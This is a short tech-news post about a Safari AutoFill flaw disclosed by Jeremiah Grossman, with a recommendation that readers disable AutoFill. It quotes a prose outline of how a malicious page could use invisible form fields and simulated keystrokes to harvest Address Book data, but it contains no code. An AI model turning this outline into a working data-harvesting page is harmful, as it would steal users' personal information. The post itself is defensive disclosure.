Turn Off Your Safari AutoFill, a Nasty Exploit Could Steal Your Address Book

The web's full of vulnerabilities, but this exploit, which allows code to quietly yank your Mac's Address Book with Safari's AutoFill, seems bad enough that you should probably take a few seconds to disable AutoFill, just to be safe.


9to5Mac is bringing attention to the exploit, which was exposed and covered in detail by Jeremiah Grossman:

These fields are AutoFill'ed using data from the users personal record in the local operating system address book. Again it is important to emphasize this feature works even though a user never entered this data on any website. Also this behavior should not be confused with normal auto-complete data a Web browser may remember after its typed into a form.

All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript. When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker.

As shown in the proof-of-concept code (graciously hosted by Robert "RSnake" Hansen), the entire process takes mere seconds and represents a major breach in online privacy. This attack could be further leveraged in multistage attacks including email spam, (spear) phishing, stalking, and even blackmail if a user is de-anonymized while visiting objectionable online material.

Turn Off Your Safari AutoFill, a Nasty Exploit Could Steal Your Address Book

Grossman told Apple about the issue over a month ago but hasn't heard back yet, so yeah, probably a good idea for Safari users to go to Preferences and uncheck all AutoFill until this is addressed. [Jeremiah Grossman via 9to5Mac]